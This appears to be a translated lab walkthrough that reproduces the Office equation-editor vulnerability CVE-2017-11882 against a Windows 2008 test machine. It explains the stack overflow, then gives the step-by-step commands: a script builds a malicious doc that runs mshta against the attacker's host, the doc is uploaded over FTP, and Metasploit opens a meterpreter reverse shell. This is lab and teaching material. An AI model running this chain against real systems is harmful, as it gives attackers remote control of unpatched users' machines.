Office Remote Code Execution Vulnerability (CVE-2017-11882) Vulnerability Reappears

1. Vulnerability principle

CVE-2017-11882 allows an attacker to run arbitrary code in the context of the current user, resulting in the inability to properly handle objects in memory, which is "Microsoft Office Memory Corruption Vulnerability", a remote execution vulnerability for stack overflow

The vulnerability is EQNEDT32.EXEcaused by a buffer overflow in the component. When a victim user opens an Office document, the vulnerability may be exploited, causing great harm. The reason is due to EQNEDT32.EXEthe process reading in ole data which contains MathType. The size allocated by the function to the Font Name data is 0x24 bytes, if the size is exceeded, the stack buffer will overflow. However, the program did not verify its length when copying the formula Font Name data, which led to the occurrence of vulnerabilities

Kill the following versions of Office that are not updated:

• Microsoft Office 2000
• Microsoft Office 2003
• Microsoft Office 2007 Service Pack 3
• Microsoft Office 2010 Service Pack 2
• Microsoft Office 2013 Service Pack 1
• Microsoft Office 2016
• MicrosoftOffice 365

Vulnerability environment:

攻击机：Kali（10.10.0.11）
工具：metasploit

目标靶机：Windows2008 （10.10.0.9）
工具：Office软件、Ftpserver

---

2. View the exploit file on the Kali platform

Payload file (doc file) ready to attack:

This file is generated by Github's CVE-2017-11882.pyattack script

python CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o payload-cale.doc

Its function is to open the office text and pop up the computer program at the same time. This experiment uses this text to verify whether there is an Office remote code execution vulnerability (CVE-2017-11882) vulnerability on the target machine.

---

3. Log in to the target machine and open the FTP server

Open the FTP server. Click the green button on the far left to start the ftp server:

The following changes can be seen: The ftp server starts. "FTP service online" is displayed. The FTP file directory is on the desktop of the target machine

---

4. Log in to Kali and use the FTP server to upload the payload-cale.doc file

Switch to the root account on the Kali terminal, and then use the ftp tool to connect to the target machine service:

After successfully logging in to ftp, upload the payload-cale.doc file to the target target machine windows2008 through the command

put /home/college/CVE-2017-11882-payload/payload-cale.doc /payload-cale.doc

---

5. Log in to the target machine, trigger the doc file, and verify that there are loopholes

---

6. Log in to the kali platform, execute the command, and generate a doc document containing the attack code

python CVE-2017-11882.py -c "mshta http://10.10.0.11:8080/payload" -o payloadattack.doc 

Use the FTP service to upload files to the target machine:

---

7. Start and configure metapsloit on the kali platform

start up:

msfconsole

Find the CVE-2017-11882 vulnerability:

search CVE-2017-11882 

Load the attack exploit program, set the payload and various parameters:

 use exploit/windows/smb/CVE-2017-11882 

Set the payload to rebound tcp:

set payload windows/meterpreter/reverse_tcp

Set the local machine address:

set lhost 10.10.0.11

Set the path of the uri:

 set URIPATH payload

After running the payload and starting the exploit, msf will listen to port 8080 of the machine, and when the target machine accesses it 10.10.0.11:8080/payload, it will bounce back to the tcp session on port 4444 when the link is opened.

Initiate a vulnerability attack:

exploit -j 

---

8. Double-click the payloadattack.doc document on the target platform to trigger the vulnerability

On the desktop of the target machine, you can see the file uploaded by ftp in the previous step, double-click to open this file, and the connection can be established